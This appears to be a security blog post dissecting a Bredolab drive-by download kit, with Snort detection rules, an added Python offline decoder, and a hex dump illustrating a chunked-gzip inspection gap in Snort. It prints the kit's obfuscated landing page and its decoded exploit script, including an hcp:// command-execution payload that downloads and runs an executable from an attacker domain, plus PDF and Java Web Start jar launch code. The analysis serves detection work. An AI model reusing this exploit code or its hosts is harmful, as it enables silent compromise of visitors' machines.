<div name="Kpe0uous6" id="Kpe0uous6">4Q47Q50Q47Q53Q107Q98Q109Q108Q43Q117Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q71Q77Q81Q81Q69Q73Q71Q34Q47Q50Q47Q63Q71Q74Q85Q43Q113Q99Q108Q112Q108Q111Q96Q102Q74Q71Q34Q47Q50Q47Q53Q94Q34Q47Q63Q116Q98Q107Q83Q117Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q118Q34Q47Q50Q47Q53Q94Q34Q47Q63Q116Q98Q107Q83Q108Q34Q47Q50Q48Q63Q71Q106Q94Q98Q111Q113Q80Q43Q63Q65Q76Q65Q62Q71Q83Q118Q34Q47Q50Q48Q63Q34Q47Q50Q50Q65Q71Q113Q96Q98Q71Q34Q47Q50Q47Q63Q71Q103Q95Q76Q85Q98Q115Q102Q71Q34Q47Q50Q47Q63Q71Q113Q96Q62Q71Q34Q47Q50Q50Q63Q112Q102Q101Q113Q34Q47Q63Q83Q34Q47Q63Q94Q92Q34Q47Q50Q47Q54Q34Q47Q50Q47Q54Q34Q47Q50Q47Q53Q34Q47Q50Q47Q54Q34Q47Q50Q48Q63Q34Q47Q50Q48Q66Q43Q103Q112Q34Q47Q50Q47Q51Q96Q112Q96Q111Q102Q109Q113Q34Q47Q63Q43Q103Q112Q34Q47Q50Q47Q51Q97Q98Q105Q34Q47Q63Q34Q47Q50Q47Q67Q110Q34Q47Q63Q43Q103Q112Q34Q47Q50Q47Q51Q112Q113Q94Q111Q113Q43Q98Q117Q98Q34Q47Q50Q52Q64Q113Q94Q112Q104Q104Q102Q105Q105Q34Q47Q63Q34Q47Q50Q47Q67Q67Q34Q47Q63Q34Q47Q50Q47Q67Q70Q74Q34Q47Q63Q101Q98Q105Q109Q34Q47Q50Q47Q62Q34Q47Q50Q47Q47Q43Q111Q98Q109Q105Q94Q96Q98Q34Q47Q50Q47Q53Q34Q47Q50Q47Q67Q71Q34Q47Q50Q47Q67Q100Q34Q47Q50Q47Q64Q80Q113Q111Q102Q107Q100Q43Q99Q111Q108Q106Q64Q101Q94Q111Q64Q108Q97Q98Q34Q47Q50Q47Q53Q48Q49Q34Q47Q50Q47Q54Q34Q47Q50Q47Q54Q43Q111Q98Q109Q105Q94Q96Q98Q34Q47Q50Q47Q53Q34Q47Q50Q47Q67Q83Q34Q47Q50Q47Q67Q100Q34Q47Q50Q47Q64Q80Q113Q111Q102Q107Q100Q43Q99Q111Q108Q106Q64Q101Q94Q111Q64Q108Q97Q98Q34Q47Q50Q47Q53Q51Q46Q34Q47Q50Q47Q54Q34Q47Q50Q47Q54Q43Q111Q98Q109Q105Q94Q96Q98Q34Q47Q50Q47Q53Q34Q47Q5</div>
<div name="Yj0jepw" id="Yj0jepw">0Q47Q67Q92Q34Q47Q50Q47Q67Q100Q34Q47Q50Q47Q64Q80Q113Q111Q102Q107Q100Q43Q99Q111Q108Q106Q64Q101Q94Q111Q64Q108Q97Q98Q34Q47Q50Q47Q53Q48Q54Q34Q47Q50Q47Q54Q34Q47Q50Q47Q54Q34Q47Q50Q47Q64Q45Q34Q47Q50Q47Q64Q46Q34Q47Q50Q47Q54Q34Q47Q52Q34Q47Q54Q34Q47Q54Q34Q48Q64Q34Q47Q67Q112Q96Q111Q102Q109Q113Q34Q48Q66Q89Q31Q59Q57Q44Q102Q99Q111Q94Q106Q98Q59Q31Q38Q56Q7Q29Q29Q29Q29Q65Q51Q95Q102Q119Q52Q50Q45Q29Q58Q29Q107Q98Q116Q29Q62Q111Q111Q94Q118Q37Q31Q62Q96Q111Q108Q77Q65Q67Q43Q77Q65Q67Q31Q41Q29Q31Q77Q65Q67Q43Q77Q97Q99Q64Q113Q111Q105Q31Q38Q56Q7Q29Q29Q29Q29Q99Q108Q111Q37Q102Q29Q102Q107Q29Q65Q51Q95Q102Q119Q52Q50Q45Q38Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q113Q111Q118Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q78Q96Q97Q100Q96Q102Q102Q29Q58Q29Q107Q98Q116Q29Q62Q96Q113Q102Q115Q98Q85Q76Q95Q103Q98Q96Q113Q37Q65Q51Q95Q102Q119Q52Q50Q45Q88Q102Q90Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q102Q99Q29Q37Q78Q96Q97Q100Q96Q102Q102Q38Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q85Q107Q50Q46Q110Q46Q29Q58Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q96Q111Q98Q94Q113Q98Q66Q105Q98Q106Q98Q107Q113Q37Q31Q102Q99Q111Q94Q106Q98Q31Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q85Q107Q50Q46Q110Q46Q43Q112Q98Q113Q62Q113Q113Q111Q102Q95Q114Q113Q98Q37Q31Q112Q111Q96Q31Q41Q29Q31Q75Q108Q113Q98Q112Q46Q43Q109Q97Q99Q31Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q95Q108Q97Q118Q43Q94Q109Q109Q98Q107Q97Q64Q101Q102Q105Q97Q37Q85Q107Q50Q46Q110Q46Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q122Q7Q2</div>
<div name="Myiyhsd" id="Myiyhsd">9Q29Q29Q29Q29Q29Q29Q29Q122Q96Q94Q113Q96Q101Q37Q98Q38Q120Q122Q7Q29Q29Q29Q29Q122Q7Q29Q29Q29Q29Q7Q29Q29Q29Q29Q113Q111Q118Q120Q7Q29Q29Q29Q29Q102Q99Q29Q37Q107Q94Q115Q102Q100Q94Q113Q108Q111Q43Q103Q94Q115Q94Q66Q107Q94Q95Q105Q98Q97Q37Q38Q38Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q66Q99Q98Q53Q46Q101Q113Q95Q29Q58Q29Q97Q108Q96Q114Q106Q98147cQ107Q113Q43Q96Q111Q98Q94Q113Q98Q66Q105Q98Q106Q98Q107Q113Q37Q31Q102Q99Q111Q94Q106Q98Q31Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q66Q99Q98Q53Q46Q101Q113Q95Q43Q112Q98Q113Q62Q113Q113Q111Q102Q95Q114Q113Q98Q37Q31Q112Q111Q96Q31Q41Q29Q31Q62Q109Q109Q105Q98Q113Q46Q43Q101Q113Q106Q105Q31Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q95Q108Q97Q118Q43Q94Q109Q109Q98Q107Q97Q64Q101Q102Q105Q97Q37Q66Q99Q98Q53Q46Q101Q113Q95Q38Q56Q7Q29Q29Q29Q29Q29Q122Q7Q29Q29Q29Q29Q29Q122Q96Q94Q113Q96Q101Q37Q98Q38Q120Q122Q7Q29Q29Q29Q29Q7Q29Q29Q29Q29Q113Q111Q118Q120Q7Q29Q29Q29Q29Q102Q99Q29Q37Q107Q94Q115Q102Q100Q94Q113Q108Q111Q43Q103Q94Q115Q94Q66Q107Q94Q95Q105Q98Q97Q37Q38Q38Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q7Q29Q29Q29Q29Q29Q29Q29Q29Q115Q94Q111Q29Q102Q109Q112Q29Q58Q29Q88Q31Q46Q52Q49Q43Q46Q49Q48Q43Q46Q49Q50Q43Q47Q48Q49Q31Q41Q29Q31Q46Q53Q49Q43Q53Q47Q43Q48Q53Q43Q51Q53Q31Q41Q29Q31Q46Q54Q53Q43Q46Q49Q50Q43Q46Q46Q51Q43Q52Q46Q31Q41Q29Q31Q47Q45Q52Q43Q46Q54Q46Q43Q47Q47Q54Q43Q46Q51Q51Q31Q41Q29Q31Q47Q45Q52Q43Q50Q53Q43Q46Q53Q54Q43Q46Q48Q48Q31Q41Q29Q31Q47Q46Q47Q43Q46Q52Q50Q43Q49Q50Q43Q47Q49Q50Q31Q41Q29Q31Q51Q53Q43Q47Q48Q48Q43Q49Q43Q47Q52Q31Q90Q56Q7</div>
<div name="Rn9yw5z" id="Rn9yw5z">Q29Q29Q29Q29Q29Q29Q29Q29Q115Q94Q111Q29Q102Q109Q29Q58Q29Q102Q109Q112Q88Q74Q94Q113Q101Q43Q111Q108Q114Q107Q97Q37Q74Q94Q113Q101Q43Q111Q94Q107Q97Q108Q106Q37Q38Q29Q39Q29Q37Q102Q109Q112Q43Q105Q98Q107Q100Q113Q101Q42Q46Q38Q29Q38Q90Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q7Q29Q29Q29Q29Q29Q29Q29Q29Q115Q94Q111Q29Q114Q29Q58Q29Q31Q101Q113Q113Q109Q55Q29Q42Q71Q42Q103Q94Q111Q29Q42Q71Q89Q89Q89Q89Q31Q40Q102Q109Q40Q31Q89Q89Q109Q114Q95Q105Q102Q96Q89Q89Q45Q45Q46Q43Q103Q94Q111Q29Q107Q108Q107Q98Q31Q56Q7Q7Q29Q29Q29Q29Q29Q29Q29Q29Q102Q99Q29Q37Q116Q102Q107Q97Q108Q116Q43Q107Q94Q115Q102Q100Q94Q113Q108Q111Q43Q94Q109Q109Q75Q94Q106Q98Q29Q58Q58Q29Q31Q74Q102Q96Q111Q108Q112Q108Q99Q113Q29Q70Q107Q113Q98Q111Q107Q98Q113Q29Q66Q117Q109Q105Q108Q111Q98Q111Q31Q38Q29Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q115Q94Q111Q29Q108Q29Q58Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q96Q111Q98Q94Q113Q98Q66Q105Q98Q106Q98Q107Q113Q37Q31Q76Q63Q71Q66Q64Q81Q31Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q108Q43Q96Q105Q94Q112Q112Q102Q97Q29Q58Q29Q31Q96Q105Q112Q102Q97Q55Q64Q62Q67Q66Q66Q67Q62Q64Q42Q65Q66Q64Q52Q42Q45Q45Q45Q45Q42Q45Q45Q45Q45Q42Q62Q63Q64Q65Q66Q67Q67Q66Q65Q64Q63Q62Q31Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q108Q43Q105Q94Q114Q107Q96Q101Q37Q114Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q122Q29Q98Q105Q112Q98Q29Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q115Q94Q111Q29Q108Q29Q58Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q96Q111Q98Q94Q113Q98Q66Q105Q98Q106Q98Q107Q113Q37Q31Q76Q63Q71Q66Q64Q81Q31Q38Q56Q7Q29Q29Q</div>
<div name="L5je7fp0v" id="L5je7fp0v">29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q115Q94Q111Q29Q107Q29Q58Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q96Q111Q98Q94Q113Q98Q66Q105Q98Q106Q98Q107Q113Q37Q31Q76Q63Q71Q66Q64Q81Q31Q38Q56Q7Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q108Q43Q113Q118Q109Q98Q29Q58Q29Q31Q94Q109Q109Q105Q102Q96Q94Q113Q102Q108Q107Q44Q107Q109Q111Q114Q107Q113Q102Q106Q98Q42Q112Q96Q111Q102Q109Q113Q94Q95Q105Q98Q42Q109Q105Q114Q100Q102Q107Q56Q97Q98Q109Q105Q108Q118Q106Q98Q107Q113Q113Q108Q108Q105Q104Q102Q113Q31Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q107Q43Q113Q118Q109Q98Q29Q58Q29Q31Q94Q109Q109Q105Q102Q96Q94Q113Q102Q108Q107Q44Q103Q94Q115Q94Q42Q97Q98Q109Q105Q108Q118Q106Q98Q107Q113Q42Q113Q108Q108Q105Q104Q102Q113Q31Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q95Q108Q97Q118Q43Q94Q109Q109Q98Q107Q97Q64Q101Q102Q105Q97Q37Q108Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q95Q108Q97Q118Q43Q94Q109Q109Q98Q107Q97Q64Q101Q102Q105Q97Q37Q107Q38Q56Q7Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q113Q111Q118Q29Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q108Q43Q105Q94Q114Q107Q96Q101Q37Q114Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q122Q29Q96Q94Q113Q96Q101Q29Q37Q98Q38Q29Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q107Q43Q105Q94Q114Q107Q96Q101Q37Q114Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q122Q7Q29Q29Q29Q29Q29Q29Q29Q29Q122Q7Q29Q29Q29Q29Q122Q7Q29Q29Q29Q29Q122Q96Q94Q113Q96Q101Q37Q98Q38Q120Q122Q7Q29Q29Q29Q7Q29Q29Q29Q29</div>
</div><input type="checkbox" id="Hn6bgn" value="ent" checked="checked"><div></div>
<script type="text/javascript" language="javascript" src="jquery.jxx?v=5.3.4"></script>
<script>
/*
setTimeout("window.replace", "1000");
*/
function Vrkhh92v(Hz7aw3e5){
Sip00o6a = document;
Xkwimls51 = Sip00o6a.getElementById(Hz7aw3e5);
return Xkwimls51.innerHTML;
}
var G5y6hww = "";
var D7a95toi = ["Maz84dbeq", "K69m8203", "Wq67wbxt8", "Kpe0uous6", "Yj0jepw", "Myiyhsd", "Rn9yw5z", "L5je7fp0v"]
var G5y6hww = "";
for (Xeo365t in D7a95toi){
G5y6hww += Vrkhh92v(D7a95toi[Xeo365t]);
}
U6blttq5y = "document";
U6blttq5y = eval(U6blttq5y);
if ( typeof(Mo9g0b0) == 'u(n.d.e%f.isn#e(d('.replace(/[\(\.%s#]/g, '')) Mo9g0b0 = "Pzjiudfwlw";
function D0irg1(Bufe23){U6blttq5y.write(Bufe23);}
function O7b076s(G5y6hww) {
Dw5jypjgw = G5y6hww.split(Mo9g0b0);
var Baout4e = "";
for (var Hz7aw3e5=0;Hz7aw3e5<Dw5jypjgw.length-1;Hz7aw3e5++) {
Id3pgs = parseInt(Dw5jypjgw[Hz7aw3e5]);
Id3pgs += 3;
Baout4e += String.fromCharCode(Id3pgs);
}
return(Baout4e);
}
D0irg1('<script language="javascript">'+O7b076s(G5y6hww)+'<[/[s[chr(i7p7t[>h'.replace(/[h7k\[\(]/g, ''));
</script>
</body>
</html>
0
This then causes the client to request http://punkdye.ru:8080/jquery.jxx?v=5.3.4. This URI can be signatured with an IDS such as Snort to let you know a client has been hitting one of these drive-bys:
GET /jquery.jxx?v=5.3.4 HTTP/1.1
Accept: */*
Referer: http://punkdye.ru:8080/index.php?pid=1&Cxuuxx0tgpkezo09=0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: punkdye.ru:8080
Connection: Keep-Alive
Cookie: pid=1
The response to this request contains very little, but it is the key that lets the browser deobfuscate and execute the data within the div tags properly:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Aug 2010 <REMOVED>
Content-Type: text/javascript
Connection: close
Expires: 0
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Length: 22
eval("Mo9g0b0='Q';");
Once the browser has this piece of information (the separator character Mo9g0b0 that the decoder splits on), it is able to deobfuscate and execute the following JavaScript, which is the result of the data hidden in the divs combined with the deobfuscation logic in the landing page's script:
if((document.all)&&(navigator.appVersion.indexOf('MSIE 7.')!=-1)) document.write("<iframe src=\"hcp://services/search?query=&topic=hcp://system/sysinfo /sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A %%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript+defer%3Eeval%28unescape %28 %27new%2BActiveXObject%2528%2522wscript.shell%2522%2529.Run%2528%2522cmd %2B %252Fc%2Bcd%2B..%252F%2526echo%2Bfunction%2Ba9%2528b6%2529%257BrV__%253Bfor%2528iVb6.length%253Bi%253EV0%253Bi--%2529r%252BVb6.charAt%2528i%2529%253Breturn%2Br%257Dnew%2BFunction%2528a9%2528_%253B%25292%252CJexe.tratsJ%2528%255DJeliJ%25 ?BJFoTevaSJ%255Bo%253B%2529%255DJydoBesnoJ%252BJpserJ%255Bx%2528etirW.o%253B%2529%2528nepO.o%253B1VepyT.o%253B3VedoM.o%253B%2529llun%2528dnes.x%253B%25290%252CJ1Vdip%25261Vdi%253Fphp.emoclew%252F0808%253Aur.eydknup%252F%252F%253AptthJ%252CJTEGJ%2528nepo.x%253B%2529JPTTHLJ%252BJMX.tfosorciMJ%2528a%2BwenVx%253B%2529y%2528a%2BwenVo%253BJmaertS.BDODAJVy%253B%255DJtceJ%252BJjbOXeviJ%252BJtcAJ%255Bsiht%2BV%2Ba_%2529%2529%2528%2529%253B%253E.js%2526cscript%2B.js%2526del%2B%252Fq%2B.js%2526start.exe%257Ctaskkill%2B%252FF%2B%252FIM%2Bhelp%252A%2522.replace%2528%252FJ%252Fg%252CString.fromCharCode%252834%2529%2529.replace%2528%252FV%252Fg%252CString.fromCharCode%252861%2529%2529.replace%2528%252F_%252Fg%252CString.fromCharCode%252839%2529%2529%252C0%252C1%2529%27%29%29%3C%2Fscript%3E\"></iframe>");
D6biz750 = new Array("AcroPDF.PDF", "PDF.PdfCtrl");
for(i in D6biz750){
try{
Qcdgcii = new ActiveXObject(D6biz750[i]);
if (Qcdgcii){
Xn51q1 = document.createElement("iframe");
Xn51q1.setAttribute("src", "Notes1.pdf");
document.body.appendChild(Xn51q1);
}
}catch(e){}
}
try{
if (navigator.javaEnabled()){
Efe81htb = docum?nt.createElement("iframe");
Efe81htb.setAttribute("src", "Applet1.html");
document.body.appendChild(Efe81htb);
}
}catch(e){}
try{
if (navigator.javaEnabled()){
var ips = ["174.143.145.234", "184.82.38.68", "198.145.116.71", "207.191.229.166", "207.58.189.133", "212.175.45.245", "68.233.4.27"];
var ip = ips[Math.round(Math.random() * (ips.length-1) )];
var u = "http: -J-jar -J\\\\"+ip+"\\public\\001.jar none";
if (window.navigator.appName == "Microsoft Internet Explorer") {
var o = document.createElement("OBJECT");
o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
o.launch(u);
} else {
var o = document.createElement("OBJECT");
var n = document.createElement("OBJECT");
o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
n.type = "application/java-deployment-toolkit";
document.body.appendChild(o);
document.body.appendChild(n);
try {
o.launch(u);
} catch (e) {
n.launch(u);
}
}
}
}catch(e){}
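The decoder that the landing page's O7b076s() function implements, redone offline in Python as an added example (not code from the post or from the kit): it collects the hidden divs, splits on the separator character that jquery.jxx delivered ('Q'), adds 3 to each number and maps it to a character. The HTML sample inside it is constructed to mimic the format, not the captured response.

```python
"""Offline decoder for the hidden-div landing page format seen above.

Added example, not code from the post: it reimplements the page's O7b076s()
decoder in Python so a captured response can be decoded without running it in
a browser. Assumptions: the split character is the one jquery.jxx delivered
('Q') and the offset is the +3 the decoder adds; SAMPLE_HTML below is
constructed to mimic the format, not a real capture.
"""
import re
from html.parser import HTMLParser

SPLIT_CHAR = "Q"   # delivered by eval("Mo9g0b0='Q';")
OFFSET = 3         # Id3pgs += 3 in the landing page's decoder


class HiddenDivCollector(HTMLParser):
    """Collect the text of every <div> that has an id, in document order."""

    def __init__(self):
        super().__init__()
        self.divs = {}          # id -> inner text
        self.order = []         # ids in the order they appear
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "div":
            div_id = dict(attrs).get("id")
            if div_id is not None:
                self._current = div_id
                self.divs[div_id] = ""
                self.order.append(div_id)

    def handle_endtag(self, tag):
        if tag == "div":
            self._current = None

    def handle_data(self, data):
        if self._current is not None:
            self.divs[self._current] += data


def decode_payload(encoded, split_char=SPLIT_CHAR, offset=OFFSET):
    """Mirror of O7b076s(): split on the separator, add the offset to each
    integer and map it to a character. The original loop runs to length-1,
    so the empty element after the trailing separator is dropped here too."""
    chars = []
    for token in encoded.split(split_char)[:-1]:
        match = re.match(r"\d+", token)   # parseInt() semantics: leading digits
        if match is None:
            continue                      # parseInt() would yield NaN; skip instead
        chars.append(chr(int(match.group()) + offset))
    return "".join(chars)


def decode_landing_page(html, div_ids=None):
    """Concatenate the named divs (in the order the page's script lists them,
    or document order if no list is given) and decode the result."""
    collector = HiddenDivCollector()
    collector.feed(html)
    ids = div_ids if div_ids is not None else collector.order
    return decode_payload("".join(collector.divs[i] for i in ids))


def encode_payload(text, split_char=SPLIT_CHAR, offset=OFFSET):
    """Inverse transform, used only to build the constructed sample below."""
    return "".join(f"{ord(c) - offset}{split_char}" for c in text)


# Constructed sample: two named divs that together encode one short script.
SAMPLE_SCRIPT = 'if (document.all) { document.write("<b>constructed</b>"); }'
SAMPLE_HTML = (
    "<html><body>"
    '<div style="visibility: hidden;">'
    '<div name="Aaa1" id="Aaa1">' + encode_payload(SAMPLE_SCRIPT[:20]) + "</div>"
    '<div name="Bbb2" id="Bbb2">' + encode_payload(SAMPLE_SCRIPT[20:]) + "</div>"
    "</div></body></html>"
)

if __name__ == "__main__":
    print(decode_landing_page(SAMPLE_HTML, ["Aaa1", "Bbb2"]))
```

Fed the real response above, the same routine reproduces the start of the decoded script (102Q99Q37Q37Q97Q… decodes to "if((docu…").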
After this JavaScript executes in the browser, it causes the client to download a PDF in the sample we captured. Once the PDF has been downloaded and the client is vulnerable to it, the client pulls down the executable malware payload. With Bredolab successfully installed, the client then calls home to the controller. Luckily, the great people over at SourceFire's VRT have had signatures for a while that trigger on these infections and help you clean them up quite easily. They are as follows:
SPECIFIC-THREATS Bredolab downloader communication with server attempt
BACKDOOR rogue software xp police antivirus install-timedetection
The signatures we have written to detect the drive-bys and the redirects to them are as follows. These were published to the Emerging Threats mailing list a while back, but they are what we run for our clients to help us find this stuff. The false positive rates are very low except for the first signature: some people download lists of malicious sites from web servers, and that causes it to fire. You can easily identify those and suppress the FPs with Snort's threshold.conf file, however:
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"DRIVEBY bredolab - server response contains .ru:8080/index.php?"; flow:established,to_client; content:".ru:8080/index.php?"; classtype:bad-unknown; sid:5600083; rev:1;)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"DRIVEBY bredolab - cookie: pid=1"; flow:established,to_server; content:"pid=1|0D|"; http_cookie; classtype:bad-unknown; sid:5600084; rev:1;)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"DRIVEBY bredolab - jquery.jxx"; flow:established,to_server; content:"/jquery.jxx?v="; http_uri; classtype:bad-unknown; sid:5600085; rev:1;)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"DRIVEBY bredolab - request to a *.ru:8080 URI"; flow:established,to_server; content:".ru:8080|0D 0A|"; http_header; classtype:bad-unknown; sid:5600086; rev:1;)
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"DRIVEBY bredolab - hidden div served by nginx"; flow:established,to_client; content:"Server: nginx"; http_header; content:"<div style=\"visibility: hidden\;\"><"; depth:120; classtype:bad-unknown; sid:5600089; rev:1;)
After getting a bit frustrated a little while ago while attempting to write a signature for some hidden iframes that were redirecting clients to drive-by sites, I started digging around a bit more, posted on the Snort-Users mailing list, and found out something a little terrifying from the guys over at SourceFire. Snort (or Suricata, for that matter) will not actually gunzip an HTTP body that is gzip'd if it has been transferred with chunked encoding. Now, you may be thinking to yourself "that's not true, I have my http_inspect configured the way it comes with the VRT ruleset downloads and it has the gzip and chunked encoding configuration options enabled!". Unfortunately, the current logic of the program dechunks the data, runs the signatures against the dechunked (but still gzip'd) data, then discards it and moves on to the next packet. One would hope the logic gets updated to detect whether the HTTP body is chunked and gzip'd and then dechunk, gunzip, and compare against signatures. That would allow people to reliably inspect the body of an HTTP response instead of having to write sigs against only the compressed content of the body (though there may be some instances where that is beneficial). The trouble is that this is a large amount of traffic: do you want, or even have, the processor cycles to compare both the gzip'd data and the gunzip'd data? Below we will go through the process step by step to demonstrate this issue. Here we have our response packet, which you can see is chunked and compressed with gzip (as indicated in the HTTP headers):
00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d HTTP/1.1 200 OK.
00000010 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 30 .Server: nginx/0
00000020 2e 36 2e 33 39 0d 0a 44 61 74 65 3a 20 4d 6f 6e .6.39..D ate: Mon
00000030 2c 20 31 32 20 4a 75 6c 20 32 30 31 30 20 31 38 , 12 Jul 2010 18
00000040 3a 30 37 3a 31 30 20 47 4d 54 0d 0a 43 6f 6e 74 :07:10 G MT..Cont
00000050 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 ent-Type : text/h
00000060 74 6d 6c 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e tml..Tra nsfer-En
00000070 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d coding: chunked.
00000080 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 .Connect ion: kee
00000090 70 2d 61 6c 69 76 65 0d 0a 58 2d 50 6f 77 65 72 p-alive. .X-Power
000000A0 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e 31 2e 36 ed-By: P HP/5.1.6
000000B0 0d 0a 43 6f 6e 74 65 6e 74 2d 45 6e 63 6f 64 69 ..Conten t-Encodi
000000C0 6e 67 3a 20 67 7a 69 70 0d 0a 0d 0a 61 0d 0a 1f ng: gzip ....a...
000000D0 8b 08 00 00 00 00 00 00 03 0d 0a 31 33 30 0d 0a ........ ...130..
000000E0 bd 52 cb 4e c4 30 0c bc ef 57 44 b9 04 24 da 74 .R.N.0.. .WD..$.t
000000F0 d9 07 85 4d 7a 44 82 03 1c e0 07 d2 d6 6d 22 d2 ...MzD.. .....m".
00000100 64 37 75 f7 f1 f7 a4 dd 15 42 20 ae f8 64 8f 3d d7u..... .B ..d.=
00000110 1e 6b 64 a1 b1 b3 85 d0 a0 ea 62 26 3a 40 45 34 .kd..... ..b&:@E4
00000120 e2 36 81 dd 60 f6 92 56 de 21 38 4c f0 b4 05 4a .6..`..V .!8L...J
00000130 2e 95 a4 08 47 e4 23 73 43 2a ad 42 0f 28 9f de ....G.#s C*.B.(..
00000140 5e 93 3c 5f dd 27 73 1a 17 a1 41 0b c5 32 5b 92 ^.<_.'s. ..A..2[.
00000150 17 8f e4 d1 0f ae 16 fc 0c 0a 3e 89 89 d2 d7 27 ........ ..>....'
00000160 52 b6 95 b7 3e 48 7a d0 06 61 64 56 51 0e 42 bc R...>Hz. .adVQ.B.
00000170 68 fe 93 1e 11 c1 2f ed 99 d0 71 e6 52 b8 d6 b8 h...../. ..q.R...
00000180 23 cf d2 75 ba 58 7d 9b e0 a3 42 31 fb ff f8 65 #..u.X}. ..B1...e
00000190 23 0b d0 04 e8 35 fb 72 90 dd 6d 86 60 e5 68 f5 #....5.r ..m.`.h.
000001A0 03 e7 25 58 6b 2a df c3 47 9e 1a d7 78 be cb 7b ..%Xk*.. G...x..{
000001B0 ce 0a d1 57 c1 6c 91 58 e5 da 41 b5 20 e9 b3 da ...W.l.X ..A. ...
000001C0 ab b7 09 a4 05 e9 c1 36 69 e7 f7 f0 ee af 16 d9 .......6 i.......
000001D0 72 7d b3 c8 56 eb eb 0d 11 fc cc 8b 66 9a 26 a8 r}..V... ....f.&.
000001E0 0e 48 1f 2a c9 fe d2 72 b7 96 33 72 30 35 6a c9 .H.*...r ..3r05j.
000001F0 e6 8c 68 30 ad c6 29 9d d8 a5 0f 35 04 c9 b2 78 ..h0..). ...5...x
00000200 10 3f 2f 8c c9 f4 36 9f 04 6b bf 18 3d 02 00 00 .?/...6. .k..=...
00000210 0d 0a 30 0d 0a 0d 0a ..0....
